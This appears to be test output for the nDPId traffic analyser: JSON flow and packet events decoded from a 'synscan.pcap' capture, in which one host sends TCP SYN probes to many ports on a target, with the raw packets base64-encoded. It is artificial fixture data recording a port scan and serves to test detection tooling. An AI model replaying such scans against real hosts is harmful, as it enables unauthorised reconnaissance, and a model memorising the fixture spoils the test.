+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":901,"source":"synscan.pcap","alias":"nDPId-test","flow_id":892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"synscan.pcap","alias":"nDPId-test","flow_id":892,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAsz\/oAACoGTnisEAAIQA2GNIzSAiHdUoMYAAAAAGACDAAqbgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":902,"source":"synscan.pcap","alias":"nDPId-test","flow_id":893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"synscan.pcap","alias":"nDPId-test","flow_id":893,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAsPSIAACsG4FCsEAAIQA2GNIzSB9TdUoMYAAAAAGACEAAguwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":903,"source":"synscan.pcap","alias":"nDPId-test","flow_id":894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":903,"source":"synscan.pcap","alias":"nDPId-test","flow_id":894,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAshZcAADUGjdusEAAIQA2GNIzSA+rdUoMYAAAAAGACCAAspQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":904,"source":"synscan.pcap","alias":"nDPId-test","flow_id":895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"synscan.pcap","alias":"nDPId-test","flow_id":895,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAs2oIAADoGM\/CsEAAIQA2GNIzSCindUoMYAAAAAGACDAAiZgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":905,"source":"synscan.pcap","alias":"nDPId-test","flow_id":896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":905,"source":"synscan.pcap","alias":"nDPId-test","flow_id":896,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAsy1EAACUGWCGsEAAIQA2GNIzSBEXdUoMYAAAAAGACCAAsSgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":906,"source":"synscan.pcap","alias":"nDPId-test","flow_id":897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5989,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":906,"source":"synscan.pcap","alias":"nDPId-test","flow_id":897,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAsgekAADsGi4msEAAIQA2GNIzSF2XdUoMYAAAAAGACEAARKgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":907,"source":"synscan.pcap","alias":"nDPId-test","flow_id":898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":907,"source":"synscan.pcap","alias":"nDPId-test","flow_id":898,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAsXasAADMGt8esEAAIQA2GNIzSEcbdUoMYAAAAAGACEAAWyQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":908,"source":"synscan.pcap","alias":"nDPId-test","flow_id":899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7937,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"synscan.pcap","alias":"nDPId-test","flow_id":899,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsAAgAADkGD2usEAAIQA2GNIzTHwHdU4MZAAAAAGACCAARiwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":909,"source":"synscan.pcap","alias":"nDPId-test","flow_id":900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":909,"source":"synscan.pcap","alias":"nDPId-test","flow_id":900,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsN1QAACcG6h6sEAAIQA2GNIzTB3rdU4MZAAAAAGACEAAhEgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":910,"source":"synscan.pcap","alias":"nDPId-test","flow_id":901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":910,"source":"synscan.pcap","alias":"nDPId-test","flow_id":901,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/3IAACkGIACsEAAIQA2GNIzTH5rdU4MZAAAAAGACCAAQ8gAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":911,"source":"synscan.pcap","alias":"nDPId-test","flow_id":902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":911,"source":"synscan.pcap","alias":"nDPId-test","flow_id":902,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsWowAADkGtOasEAAIQA2GNIzTA+ndU4MZAAAAAGACCAAsowAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":912,"source":"synscan.pcap","alias":"nDPId-test","flow_id":903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":912,"source":"synscan.pcap","alias":"nDPId-test","flow_id":903,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsPj8AADgG0jOsEAAIQA2GNIzTCDTdU4MZAAAAAGACBAAsWAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":913,"source":"synscan.pcap","alias":"nDPId-test","flow_id":904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":913,"source":"synscan.pcap","alias":"nDPId-test","flow_id":904,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsHb4AAC0G\/bSsEAAIQA2GNIzTBfHdU4MZAAAAAGACCAAqmwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":914,"source":"synscan.pcap","alias":"nDPId-test","flow_id":905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":914,"source":"synscan.pcap","alias":"nDPId-test","flow_id":905,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAst4YAADUGW+ysEAAIQA2GNIzTBDrdU4MZAAAAAGACCAAsUgAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":915,"source":"synscan.pcap","alias":"nDPId-test","flow_id":906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":915,"source":"synscan.pcap","alias":"nDPId-test","flow_id":906,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAseH0AACUGqvWsEAAIQA2GNIzTAATdU4MZAAAAAGACCAAwiAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":916,"source":"synscan.pcap","alias":"nDPId-test","flow_id":907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":916,"source":"synscan.pcap","alias":"nDPId-test","flow_id":907,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAs5QAAACYGPXKsEAAIQA2GNIzTC5fdU4MZAAAAAGACDAAg9QAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":917,"source":"synscan.pcap","alias":"nDPId-test","flow_id":908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":917,"source":"synscan.pcap","alias":"nDPId-test","flow_id":908,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsG8IAADcG9bCsEAAIQA2GNIzTH2rdU4MZAAAAAGACEAAJIgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":918,"source":"synscan.pcap","alias":"nDPId-test","flow_id":909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":918,"source":"synscan.pcap","alias":"nDPId-test","flow_id":909,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsGWQAADcG+A6sEAAIQA2GNIzTFw3dU4MZAAAAAGACEAARfwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":919,"source":"synscan.pcap","alias":"nDPId-test","flow_id":910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":919,"source":"synscan.pcap","alias":"nDPId-test","flow_id":910,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsmC0AACkGh0WsEAAIQA2GNIzTAeHdU4MZAAAAAGACCAAuqwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":920,"source":"synscan.pcap","alias":"nDPId-test","flow_id":911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1066,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":920,"source":"synscan.pcap","alias":"nDPId-test","flow_id":911,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsqo0AADAGbeWsEAAIQA2GNIzTBCrdU4MZAAAAAGACBAAwYgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":921,"source":"synscan.pcap","alias":"nDPId-test","flow_id":912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":921,"source":"synscan.pcap","alias":"nDPId-test","flow_id":912,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsj2EAADAGiRGsEAAIQA2GNIzTFKDdU4MZAAAAAGACBAAf7AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":922,"source":"synscan.pcap","alias":"nDPId-test","flow_id":913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":922,"source":"synscan.pcap","alias":"nDPId-test","flow_id":913,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsTgwAADAGymasEAAIQA2GNIzSHmLdUoMYAAAAAGACBAAWLQAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":923,"source":"synscan.pcap","alias":"nDPId-test","flow_id":914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":923,"source":"synscan.pcap","alias":"nDPId-test","flow_id":914,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAspWAAADAGcxKsEAAIQA2GNIzSA9vdUoMYAAAAAGACBAAwtAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":924,"source":"synscan.pcap","alias":"nDPId-test","flow_id":915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":924,"source":"synscan.pcap","alias":"nDPId-test","flow_id":915,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsErEAADIGA8KsEAAIQA2GNIzSFi\/dUoMYAAAAAGACDAAWYAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":925,"source":"synscan.pcap","alias":"nDPId-test","flow_id":916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 